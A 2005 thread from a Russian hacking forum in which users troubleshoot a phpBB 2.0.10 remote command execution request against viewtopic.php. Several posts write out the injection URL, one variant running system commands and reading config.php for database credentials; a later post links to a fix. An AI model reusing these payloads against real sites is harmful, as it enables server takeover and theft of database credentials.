Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   Проблема с phpbb 2.0.10 (https://forum.antichat.xyz/showthread.php?t=5436)

Thrasher 13.03.2005 14:17
Проблема с phpbb 2.0.10
 
Привет всем!
Господа, подскажите, плиз, что не так.
Прочитал про уязвимость в phpbb 2.0.10, там был приведен такой запрос: viewtopic.php?t=4&highlight=%2527.$poster=%60$cmd% 60.%2527&cmd=cd%20..;id;ls;pwd
Пробовал его выполнять, менял значения cmd. Ничего не получается, выдается только страница с соответствующим топиком. Может где ошибка в запросе, или я что делаю не так. Подскажите.
Заранее спасибо.

(-=util=-) 13.03.2005 14:23
Юзай мазилку и пользуйся expl. для cookie 8)) Последнее видео качни одно снял KEZ второе max_pain.

buian 13.03.2005 16:24
гЫ
 
гЫ на большиствах форумах етот эксплоит уже не пашет!! даже на тех из видио...

(-=util=-) 13.03.2005 16:36
значит patched :)

temon 13.03.2005 18:35
Цитата:
Сообщение от Thrasher
Привет всем!
Господа, подскажите, плиз, что не так.
Прочитал про уязвимость в phpbb 2.0.10, там был приведен такой запрос: viewtopic.php?t=4&highlight=%2527.$poster=%60$cmd% 60.%2527&cmd=cd%20..;id;ls;pwd
Пробовал его выполнять, менял значения cmd. Ничего не получается, выдается только страница с соответствующим топиком. Может где ошибка в запросе, или я что делаю не так. Подскажите.
Заранее спасибо.
Попробуй лучше вот так:

&highlight=%2527.$poster=%60$ls%60.%2527&ls=id;una me%20-a;cat%20config.php|grep%20db

Thrasher 14.03.2005 13:30
Цитата:
Попробуй лучше вот так:

&highlight=%2527.$poster=%60$ls%60.%2527&ls=id;una me%20-a;cat%20config.php|grep%20db
Так тоже пробовал, не помогает.

hacsoft 15.03.2005 23:55
Да, тот метод закрывается легко.
Кому интересно как, см. на моем форуме: http://hacsoft.h14.ru/phpBB2/viewtopic.php?t=94


Время: 02:26